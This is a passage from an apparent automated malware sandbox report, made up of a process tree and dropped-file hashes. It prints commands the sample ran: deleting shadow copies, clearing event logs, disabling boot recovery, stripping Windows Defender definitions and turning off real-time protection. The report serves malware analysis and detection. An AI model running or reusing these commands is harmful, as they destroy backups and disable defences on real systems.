C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1108
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1196 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:908 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1224 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1888 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:560 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:588 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:532 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:884
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1116 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1092
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1624 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2128
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\ResetCopy.doc"1⤵
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2256
-
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -Embedding1⤵
- Loads dropped DLL
PID:2600
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:2664 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2471F11BCFE9CE298581B2318EC712B62⤵
- Loads dropped DLL
PID:2820
-
C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe"C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Setup.exe" -Embedding1⤵
- Loads dropped DLL
PID:2716
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\Built-In Building Blocks.dotx.LaqUbAms-k7jEeGSPX1G4_fqjsVWWF7IbyM-JlU7W73_AAAAAAAAAAA0.2wfv1
MD5230f2df42a22d6ee66d0fc015e9606b9
SHA1cba72993428c4cffba468f9812e5ffe258e6df73
SHA25609e05f7be5d85dbe92bd7dfce70456b8d81330d0f6a6857a3a15c46cd2a937b3
SHA512c05cd4a74fe96be75779af7b86064a5c8caecc8e40383ca589b3c29166fe5bc88df71bd7c2057956bf3fbb4b44acf617d81e491dada115c8e1cad3229b18790e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD59a96c32645eced2c829796814ea241ee
SHA1ae6d8eb74657d54d1abcaa63cc9013be8f13b528
SHA256043e7c44937f3677c28acd3d7eb76ec10f843058bc39935377bdebdb857b4c2d
SHA512ca3e0be4dc51beb4195fd8657b35ecd33254802552ce64cbb9010a055827927fd0b44b8ddf513e429b651bb8e2e42a731c181aaf7db428e8114980bfe57223e6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD54e04a52b484aee0fc50290488e694010
SHA185a67593fae58158b3183b8c63ca87fdaa59353d
SHA2562dd9767036c8ac01daaf6bf6005da9544427816c071264ec0f906a638ad29b88
SHA51293c0517b8c7e052cbf64e722857fd6b62a17d857fbfaa37811face54a85a2c7377ef128c373dc3af51f8d0681ba11beb5c02180d0283787d54242ecc014ed6d5
-
MD5
b9be1af7c38499ca4e84b0d2cf06d6e8
SHA1f545a60f9d46ae915a8b5c04c25f124822c6cc48
SHA2562df9569b22c738ad3ea5fd1ca731be8d9a70f3397ee50b9e0fcca838604a6567
SHA512bdb560599564a82fbda5e9b058c28eadb3e9c8aebf0d035bb03a8564d6f0a80cd1323a41fce6f07499a9e2797bcd92d436b315a85b6c57c19f186b06fa4784be
-
MD5
d1f5ce6b23351677e54a245f46a9f8d2
SHA10d5c6749401248284767f16df92b726e727718ca
SHA25657cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc
SHA512960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba
-
MD5
d1f5ce6b23351677e54a245f46a9f8d2
SHA10d5c6749401248284767f16df92b726e727718ca
SHA25657cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc
SHA512960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba
-
MD5
9cadbfa797783ff9e7fc60301de9e1ff
SHA183bde6d6b75dfc88d3418ec1a2e935872b8864bb
SHA256c1eda5c42be64cfc08408a276340c9082f424ec1a4e96e78f85e9f80d0634141
SHA512095963d9e01d46dae7908e3de6f115d7a0eebb114a5ec6e4e9312dbc22ba5baa268f5acece328066c9456172e90a95e097a35b9ed61589ce9684762e38f1385b
-
MD5
4a843a97ae51c310b573a02ffd2a0e8e
SHA1063fa914ccb07249123c0d5f4595935487635b20
SHA256727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086
SHA512905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2
-
MD5
4a843a97ae51c310b573a02ffd2a0e8e
SHA1063fa914ccb07249123c0d5f4595935487635b20
SHA256727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086
SHA512905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2
-
MD5
d1f5ce6b23351677e54a245f46a9f8d2
SHA10d5c6749401248284767f16df92b726e727718ca
SHA25657cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc
SHA512960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba
-
MD5
5577a98daef4ba33e900a3e3108d6cc1
SHA15af817186ab0376a0433686be470ea2b48c74f5f
SHA256148199b4f3b6b2030e2aeb63a66e8e333e692d38691bcbe39139cf02bb61b31d
SHA512d37d511975b5331a5b1cdda736890c7d4f2dcba4abac2b9399c977bdb7e09c964327e3f771cd592e2632b0e776545c490f29fd391ec13c7948557957cd805dd5
-
MD5
5a1e6b155435693938596d58eaca74bb
SHA127fb323ccc215136ef350469072b6ad559d39c3d
SHA256f2d5eb947b85f763f72de7f800118844a5207c9e3dd456f13186c2aaf0c485ac
SHA5124fee8576ef5541d4923aacb514b09e1e4dc8d6cbb1dcaada67c65240358147b971c2a1d034faf50c594ae7edb4a3c68dd4ffbbb69893413ffb52e71a86c65388
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
f44367f4a0bdcc43329d346762ee4667
SHA1ab11b6c514f0e31af10601bd4ec65064f3e664f3
SHA256ebd6c623da8d3ac9ab1b7a9d9e8a77fb5fa6958728e8b7ce1a2e1c43db9dd058
SHA5128d72e695a169ead03a181c2c2a9e7450fd24564cb7f15a368b44e97638ebf5522d2390be7a3fccee6412bf4754cbc97025d4cfc39dd3a1571c5b41039d29f0c2
-
MD5
f44367f4a0bdcc43329d346762ee4667
SHA1ab11b6c514f0e31af10601bd4ec65064f3e664f3
SHA256ebd6c623da8d3ac9ab1b7a9d9e8a77fb5fa6958728e8b7ce1a2e1c43db9dd058
SHA5128d72e695a169ead03a181c2c2a9e7450fd24564cb7f15a368b44e97638ebf5522d2390be7a3fccee6412bf4754cbc97025d4cfc39dd3a1571c5b41039d29f0c2
-
MD5
f44367f4a0bdcc43329d346762ee4667
SHA1ab11b6c514f0e31af10601bd4ec65064f3e664f3
SHA256ebd6c623da8d3ac9ab1b7a9d9e8a77fb5fa6958728e8b7ce1a2e1c43db9dd058
SHA5128d72e695a169ead03a181c2c2a9e7450fd24564cb7f15a368b44e97638ebf5522d2390be7a3fccee6412bf4754cbc97025d4cfc39dd3a1571c5b41039d29f0c2
-
MD5
fcc38158c5d62a39e1ba79a29d532240
SHA1eca2d1e91c634bc8a4381239eb05f30803636c24
SHA256e51a5292a06674cdbbcea240084b65186aa1dd2bc3316f61ff433d9d9f542a74
SHA5120d224474a9358863e4bb8dacc48b219376d9cc89cea13f8d0c6f7b093dd420ceb185eb4d649e5bd5246758419d0531922b4f351df8ad580b3baa0fab88d89ec7
-
MD5
196a884e700b7eb09b2cd0a48eccbc3a
SHA1a400c341adaf960022fe4f97ab477e0ab1e02a96
SHA25612babd301ab2f5a0cd35226d4939e1e200d5fcf90694a25690df7ad0ea28b55a
SHA512b9f0229e3ed822b79ab2ffa41b67343215bde419a44c638422734f75191f2359bcfeb3553189e17a89b5edfa25016484ec78df48eb05049c72b1d393dd3f4041
-
MD5
fcc38158c5d62a39e1ba79a29d532240
SHA1eca2d1e91c634bc8a4381239eb05f30803636c24
SHA256e51a5292a06674cdbbcea240084b65186aa1dd2bc3316f61ff433d9d9f542a74
SHA5120d224474a9358863e4bb8dacc48b219376d9cc89cea13f8d0c6f7b093dd420ceb185eb4d649e5bd5246758419d0531922b4f351df8ad580b3baa0fab88d89ec7
-
MD5
196a884e700b7eb09b2cd0a48eccbc3a
SHA1a400c341adaf960022fe4f97ab477e0ab1e02a96
SHA25612babd301ab2f5a0cd35226d4939e1e200d5fcf90694a25690df7ad0ea28b55a
SHA512b9f0229e3ed822b79ab2ffa41b67343215bde419a44c638422734f75191f2359bcfeb3553189e17a89b5edfa25016484ec78df48eb05049c72b1d393dd3f4041
-
MD5
d1f5ce6b23351677e54a245f46a9f8d2
SHA10d5c6749401248284767f16df92b726e727718ca
SHA25657cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc
SHA512960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba
-
MD5
d1f5ce6b23351677e54a245f46a9f8d2
SHA10d5c6749401248284767f16df92b726e727718ca
SHA25657cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc
SHA512960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba
-
MD5
9cadbfa797783ff9e7fc60301de9e1ff
SHA183bde6d6b75dfc88d3418ec1a2e935872b8864bb
SHA256c1eda5c42be64cfc08408a276340c9082f424ec1a4e96e78f85e9f80d0634141
SHA512095963d9e01d46dae7908e3de6f115d7a0eebb114a5ec6e4e9312dbc22ba5baa268f5acece328066c9456172e90a95e097a35b9ed61589ce9684762e38f1385b
-
MD5
4a843a97ae51c310b573a02ffd2a0e8e
SHA1063fa914ccb07249123c0d5f4595935487635b20
SHA256727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086
SHA512905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2
-
MD5
4a843a97ae51c310b573a02ffd2a0e8e
SHA1063fa914ccb07249123c0d5f4595935487635b20
SHA256727ecf287fb6f4953ee7748913dd559b4f8d3a022fa2ca55bc51cf5886c52086
SHA512905c081552d95b523ecf1155b6c7e157652e5ff00cda30c1c21124d266eb7d305c3398d6832316f403dc45d1b639f1a5a67aea29922cd1a032f52e5247ec55d2
-
MD5
d1f5ce6b23351677e54a245f46a9f8d2
SHA10d5c6749401248284767f16df92b726e727718ca
SHA25657cb8f01cf553c3886760180d1a74839f2f676640115504485aca9692f577acc
SHA512960e90894e7bedcc89894e77e57e8ee0c99dd2c530d02665e8bbd3a1793eccc1e295c5923d1f37c757fa1158097fbaae70898c16052882d3d210c29ea801b3ba
-
MD5
5577a98daef4ba33e900a3e3108d6cc1
SHA15af817186ab0376a0433686be470ea2b48c74f5f
SHA256148199b4f3b6b2030e2aeb63a66e8e333e692d38691bcbe39139cf02bb61b31d
SHA512d37d511975b5331a5b1cdda736890c7d4f2dcba4abac2b9399c977bdb7e09c964327e3f771cd592e2632b0e776545c490f29fd391ec13c7948557957cd805dd5
-
MD5
5a1e6b155435693938596d58eaca74bb
SHA127fb323ccc215136ef350469072b6ad559d39c3d
SHA256f2d5eb947b85f763f72de7f800118844a5207c9e3dd456f13186c2aaf0c485ac
SHA5124fee8576ef5541d4923aacb514b09e1e4dc8d6cbb1dcaada67c65240358147b971c2a1d034faf50c594ae7edb4a3c68dd4ffbbb69893413ffb52e71a86c65388